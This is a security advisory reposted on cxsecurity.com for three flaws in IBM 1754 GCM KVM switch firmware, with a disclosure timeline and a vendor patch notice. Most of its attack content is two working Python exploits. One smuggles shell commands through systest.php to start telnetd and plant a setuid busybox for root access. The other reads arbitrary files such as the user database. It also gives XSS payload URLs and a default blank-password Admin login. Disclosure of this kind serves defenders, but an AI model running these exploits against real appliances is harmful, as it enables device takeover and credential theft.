IBM 1754 GCM KVM Code Execution / File Read / XSS

2014-07-22 / 2014-08-25
Risk: High
Local: No
Remote: Yes
CWE: CWE-79

*Product description* The IBM 1754 GCM family provides KVM over IP and serial console management technology in a single appliance. Versions v1.20.0.22575 and prior are vulnerables. Note that this vulnerability is also present in some DELL and probably other vendors of this rebranded KVM. I contacted Dell but no response has been received. *1. Remote code execution * CVEID: CVE-2014-2085 Description: Improperly sanitized input may allow a remote authenticated attacker to perform remote code execution on the GCM KVM switch. PoC of this vulnerability: #!/usr/bin/python""" Exploit for Avocent KVM switch v1.20.0.22575. Remote code execution with privilege elevation. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. Default user is "Admin" with blank password. After running exploit, connect using telnet to device with user target (pass: target) then do "/tmp/su -" to gain root (password "root") alex.a.bravo@gmail.com """ from StringIO import StringIO import pycurl import os sessid = "1111111111" target = "192.168.0.10" durl = "https://" + target + "/systest.php?lpres=;%20/usr/ sbin/telnetd%20;%20cp%20/bin/busybox%20/tmp/su%20;%20chmod% 206755%20/tmp/su%20;" storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, durl) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.COOKIE,'avctSessionId=' + sessid) try: print "[*] Sending GET to " + target + " with session id " + sessid + "..." c.perform() c.close() except: print "" finally: print "[*] Done" print "[*] Trying telnet..." print "[*] Login as target/target, then do /tmp/su - and enter password \"root\"" os.system("telnet " + target) *2. Arbitrary file read * CVEID: CVE-2014-3081 Description: This device allows any authenticated user to read arbitrary files. Files can be anywhere on the target. PoC of this vulnerability: #!/usr/bin/python """ This exploit for Avocent KVM switch v1.20.0.22575 allows an attacker to read arbitrary files on device. SessionId (avctSessionId) is neccesary for this to work, so you need a valid user. alex.a.bravo@gmail.com """ from StringIO import StringIO import pycurl sessid = "1111111111" target = "192.168.0.10" file = "/etc/IBM_user.dat" durl = "https://" + target + "/prodtest.php?engage=video_ bits&display=results&filename=" + file storage = StringIO() c = pycurl.Curl() c.setopt(c.URL, durl) c.setopt(c.SSL_VERIFYPEER,0) c.setopt(c.SSL_VERIFYHOST,0) c.setopt(c.WRITEFUNCTION,storage.write) c.setopt(c.COOKIE,'avctSessionId=' + sessid) try: c.perform() c.close() except: print "" content = storage.getvalue() print content.replace("<td>","").replace("</td>","") *3. Cross site scripting non-persistent* CVEID: CVE-2014-3080 Description: System is vulnerable to cross-site scripting, caused by improper validation of user-supplied input. A remote attacker could exploit this vulnerability using a specially-crafted URL to execute script in a victim's Web browser within the security context of the hosting Web site, once the URL is clicked. An attacker could use this vulnerability to steal the victim's cookie-based authentication credentials. Examples: http://kvm/kvm.cgi?%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E https://kvm/avctalert.php?arg1=dadadasdasd&arg2=dasdasdas&key=%3Cscript%3Ealert%28%22aaa%22%29%3C/script%3E *Vendor Response:* IBM release 1.20.20.23447 firmware *Timeline:* 2014-05-20 - Vendor (PSIRT) notified 2014-05-21 - Vendor assigns internal ID 2014-07-16 - Patch Disclosed 2014-07-17 - Vulnerability disclosed *External Information:* Info about the vulnerability (spanish): http://www.bitcloud.es/2014/07/tres-nuevas-vulnerabilidades-en-ibm-gcm.html IBM Security Bulletin: http://www-947.ibm.com/support/entry/portal/docdisplay?lndocid=MIGR-5095983 -- -- Alejandro Alvarez Bravo alex.a.bravo@gmail.com


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2024, cxsecurity.com

 

Back to Top